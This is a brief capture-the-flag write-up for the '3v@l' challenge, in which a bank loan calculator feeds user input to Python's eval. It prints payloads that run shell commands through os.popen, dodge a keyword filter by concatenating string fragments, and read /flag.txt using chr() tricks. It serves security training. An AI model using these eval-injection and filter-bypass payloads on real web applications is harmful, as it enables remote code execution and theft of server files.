3v@l
ABC Bank's website has a loan calculator to help its clients calculate the amount they pay if they take a loan from the bank. Unfortunately, they are using an eval function to calculate the loan. Bypassing this will give you Remote Code Execution (RCE). Can you exploit the bank's calculator and read the flag?
We are presented with a website running on Python. ![[wappalyzer_image.png]]
Here the eval function takes the submitted expression string and executes it as Python code on the server, which is what makes the calculator exploitable.
So let's try some known payloads:

```python
__import__('os').popen('ls').read()
```

But I have got this message:
![[error_1.png]]
So there is a filter on certain keywords. Let's try another trick with this payload, which splits the filtered words into concatenated string fragments:

```python
__builtins__.__dict__['__im'+'port__']('o'+'s').popen('l'+'s').read()
```

And we have successfully bypassed the filter.
![[suc_1.png]]
The flag is in /flag.txt.
So I tried many payloads to read this file, but this one worked:

```python
open(chr(47)+'flag'+chr(46)+'txt').read()
```